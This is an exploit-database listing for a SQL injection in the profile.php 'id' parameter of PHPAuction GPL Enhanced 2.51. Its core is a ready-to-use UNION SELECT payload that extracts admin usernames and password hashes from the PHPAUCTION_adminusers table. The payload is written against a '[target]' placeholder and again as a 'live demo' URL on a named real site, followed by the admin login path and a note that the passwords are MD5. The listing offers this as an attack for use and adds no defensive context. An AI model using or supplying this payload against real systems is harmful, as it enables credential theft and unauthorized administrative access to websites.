[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHPAuction GPL Enhanced 2.51 (profile.php) SQL Injection Vulnerability

Author
Hussin X
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3490
Category
web applications
Date add
31-07-2008
Platform
unsorted
======================================================================
PHPAuction GPL Enhanced 2.51 (profile.php) SQL Injection Vulnerability
======================================================================


|___________________________________________________|
|
| PHPAuction GPL Enhanced V2.51 (profile.php id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|
|
|___________________________________________________
|                                                   |
|
|
| script : http://phpauctions.info/
|
| DorK   : /:)
|___________________________________________________|

Exploit:  



www.[target].com/Script/profile.php?id=-19+union+select+1,concat(username,0x3e,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+FROM+PHPAUCTION_adminusers--


L!VE DEMO: :


http://phpauctions.info/phpauction/demo/profile.php?id=-19+union+select+1,concat(username,0x3e,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+FROM+PHPAUCTION_adminusers--


___________________

admin login :

www.[target].com/Script/admin/
___________________
password : md5
___________________




#  0day.today [2024-12-25]  #